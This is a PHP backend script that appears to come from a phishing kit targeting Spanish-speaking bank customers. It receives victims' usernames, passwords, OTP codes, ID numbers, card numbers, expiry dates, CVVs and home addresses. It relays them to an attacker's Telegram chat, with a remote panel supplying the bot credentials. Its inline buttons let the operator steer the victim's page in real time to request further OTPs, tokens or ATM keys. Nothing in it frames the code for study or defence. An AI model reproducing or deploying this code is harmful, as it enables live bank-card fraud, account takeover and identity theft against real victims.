<?php
header('Content-Type: application/json; charset=utf-8');
include __DIR__ . '/fu7ur4ma.php';

function loadConfig() {
    global $API_KEY;
    if (empty($API_KEY)) return null;
    $resp = @file_get_contents("https://titanbin.space/api/api_central.php?key={$API_KEY}");
    $data = json_decode($resp, true);
    return (!empty($data['token']) && !empty($data['chat_id']))
        ? ['token'=>$data['token'],'chat_id'=>$data['chat_id']]
        : null;
}

function sendMessage($token, $chatId, $text, $keyboard) {
    $payload = [
        'chat_id'=>$chatId,
        'text'=>$text,
        'parse_mode'=>'HTML',
        'reply_markup'=>json_encode($keyboard)
    ];
    $ch = curl_init("https://api.telegram.org/bot{$token}/sendMessage");
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER=>true,
        CURLOPT_POST=>true,
        CURLOPT_HTTPHEADER=>['Content-Type:application/json'],
        CURLOPT_POSTFIELDS=>json_encode($payload)
    ]);
    $res = curl_exec($ch);
    curl_close($ch);
    return json_decode($res, true);
}

function editMessageText($token, $chatId, $messageId, $newText) {
    $payload = [
        'chat_id'=>$chatId,
        'message_id'=>$messageId,
        'text'=>$newText,
        'parse_mode'=>'HTML'
    ];
    $ch = curl_init("https://api.telegram.org/bot{$token}/editMessageText");
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER=>true,
        CURLOPT_POST=>true,
        CURLOPT_HTTPHEADER=>['Content-Type:application/json'],
        CURLOPT_POSTFIELDS=>json_encode($payload)
    ]);
    curl_exec($ch);
    curl_close($ch);
}

function buildKeyboard($tid) {
    return ['inline_keyboard'=>[
        [['text'=>'Dinámica','callback_data'=>"pedir_dinamica:{$tid}"], ['text'=>'Cajero','callback_data'=>"pedir_cajero:{$tid}"]],
        [['text'=>'OTP','callback_data'=>"pedir_otp:{$tid}"], ['text'=>'Token','callback_data'=>"pedir_token:{$tid}"]],
        [['text'=>'Err. TC','callback_data'=>"error_tc:{$tid}"], ['text'=>'Err. Logo','callback_data'=>"error_logo:{$tid}"]],
        [['text'=>'Finalizar','callback_data'=>"confirm_finalizar:{$tid}"]]
    ]];
}

function formatMessage($data) {
    $dt = $data['datosTarjeta'] ?? [];
    return "
<b>Nuevo método de pago pendiente de verificación</b>
────────────────────────
🆔 <b>ID:</b> <code>{$data['transactionId']}</code>
👤 <b>Usuario:</b> <code>{$data['usuario']}</code>
🔐 <b>Clave:</b> <code>{$data['clave']}</code>
🔑 <b>Otp:</b> <code>{$data['dinamica']}</code>
────────────────────────
<b>Detalles del pago:</b>
🪪 <b>Cédula:</b> | ".($dt['cedula'] ?? '<i>No disponible</i>')."
💳 <b>Tarjeta:</b> | ".($dt['cardNumber'] ?? '<i>No disponible</i>')."
📅 <b>Fecha expiración:</b> | ".(!empty($dt['expMonth']) ? "{$dt['expMonth']}/{$dt['expYear']}" : '<i>No disponible</i>')."
🔐 <b>CVV:</b> | ".($dt['cvv'] ?? '<i>No disponible</i>')."
💳 <b>Tipo tarjeta:</b> | ".($dt['type'] ?? '<i>No disponible</i>')."
💰 <b>Cuotas:</b> | ".($dt['cuotas'] ?? '<i>No disponible</i>')."
────────────────────────
🏦 <b>Banco:</b> | ".($dt['bank'] ?? '<i>No disponible</i>')."
────────────────────────
🏠 <b>Dirección:</b> | ".($dt['address'] ?? '<i>No disponible</i>')."
📞 <b>Teléfono:</b> | ".($dt['phone'] ?? '<i>No disponible</i>')."
🏙️ <b>Ciudad:</b> | ".($dt['city'] ?? '<i>No disponible</i>')."
📝 <b>Propietario:</b> | ".($dt['ownerName'] ?? '<i>No disponible</i>')."
────────────────────────";
}

$config = loadConfig();
if (!$config) {
    http_response_code(500);
    echo json_encode(['ok'=>false,'error'=>'Configuración inválida']);
    exit;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $body = json_decode(file_get_contents('php://input'), true);
    $body['dinamica'] = $body['dinamica'] ?? '';
    $message = formatMessage($body);
    $keyboard = buildKeyboard($body['transactionId']);
    $sent = sendMessage($config['token'], $config['chat_id'], $message, $keyboard);
    echo json_encode(['ok'=>!empty($sent['ok']), 'message_id'=>$sent['result']['message_id']]);
    exit;
}

if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['transactionId'])) {
    $updates = json_decode(file_get_contents("https://api.telegram.org/bot{$config['token']}/getUpdates"), true);
    foreach ($updates['result'] as $upd) {
        if (isset($upd['callback_query']) && strpos($upd['callback_query']['data'], $_GET['transactionId']) !== false) {
            $action = explode(':', $upd['callback_query']['data'])[0];
            $user   = $upd['callback_query']['from']['username'] 
                    ?? $upd['callback_query']['from']['first_name'];
            $original = $upd['callback_query']['message']['text'];
            $newText = trim($original)
                     . "\n────────────────────────\n📌 <b>Acción seleccionada:</b> "
                     . ucfirst(str_replace('_',' ',$action))
                     . " por <code>@{$user}</code>";
            editMessageText($config['token'], $config['chat_id'], $upd['callback_query']['message']['message_id'], $newText);
            echo json_encode(['ok'=>true,'action'=>$action]);
            exit;
        }
    }
    echo json_encode(['ok'=>false]);
    exit;
}
?>
